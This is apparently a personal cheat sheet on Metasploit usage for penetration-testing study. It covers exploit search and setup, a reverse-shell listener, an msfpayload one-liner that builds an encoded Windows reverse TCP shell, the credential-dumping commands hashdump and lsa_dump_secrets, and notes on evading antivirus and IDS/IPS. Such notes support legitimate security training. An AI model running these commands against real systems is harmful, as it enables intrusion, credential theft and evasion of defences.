#meta #metasploit ## Usage ```shell msf6> search exploit <exploit name> msf6> use <path to exploit> #lists out options, anything marked with a yes is required msf6> show options #sets option value msf6> set <option name> <value> msf6> exploit search type:exploit platform:windows cve:2021 rank:excellent microsoft # set host permanently until msf is restarted setg RHOSTS 10.10.10.40 # Allows to pick specific target type set target <index> ``` [[Payloads Explained#Metasploit]] ### Listener for Reverse Shells ```shell use exploit/multi/handler ``` ```shell set LHOST tun0 set LPORT 1234 ``` ### File Locations ```shell /usr/share/metasploit-framework/modules /usr/share/metasploit-framework/scripts/ /usr/share/metasploit-framework/tools/ ``` ## Create Workspace ```shell sudo msfdb run workspace -a Target_1 # Hosts, Services, Creds # The loot command works in conjunction with the command above to offer you an at-a-glance list of owned services and users. # run nmap scan in msfconsole db_nmap ``` ## Encode ```shell msfpayload windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 R | msfencode -b '\x00' -f perl -e x86/shikata_ga_nai ``` [nMap (pre-installed)](https://nmap.org) [NexPose (pre-installed)](https://sectools.org/tool/nexpose/) [Nessus (pre-installed)](https://www.tenable.com/products/nessus) [Mimikatz (pre-installed V.1)](http://blog.gentilkiwi.com/mimikatz) [Stdapi (pre-installed)](https://www.rubydoc.info/github/rapid7/metasploit-framework/Rex/Post/Meterpreter/Extensions/Stdapi/Stdapi) [Railgun](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-Railgun-for-Windows-post-exploitation) [Priv](https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/post/meterpreter/extensions/priv/priv.rb) [Incognito (pre-installed)](https://www.offensive-security.com/metasploit-unleashed/fun-incognito/) [Darkoperator's](https://github.com/darkoperator/Metasploit-Plugins) ```shell hashdump lsa_dump_secrets ``` ## MSF - Loading Additional Modules ```shell msf6> loadpath /usr/share/metasploit-framework/modules/ ``` Alternatively, we can also launch `msfconsole` and run the `reload_all` command for the newly installed module to appear in the list. After the command is run and no errors are reported, try either the `search [name]` function inside `msfconsole` or directly with the `use [module-path]` to jump straight into the newly installed module. ```shell msf6 > reload_all msf6 > use exploit/unix/webapp/nagios3_command_injection ``` ```shell # suggests exploits to use on target system search local exploit suggester ``` ## Firewall and IDS/IPS Evasion Evade signature-based detection [[MSF-VirusTotal]] However, with the MSF6 release, msfconsole can tunnel AES-encrypted communication from any Meterpreter shell back to the attacker host, successfully encrypting the traffic as the payload is sent to the victim host. This mostly takes care of the network-based IDS/IPS. ## Engagement Structure The MSF engagement structure can be divided into five main categories. - Enumeration - Preparation - Exploitation - Privilege Escalation - Post-Exploitation ![[S04_SS03.png]]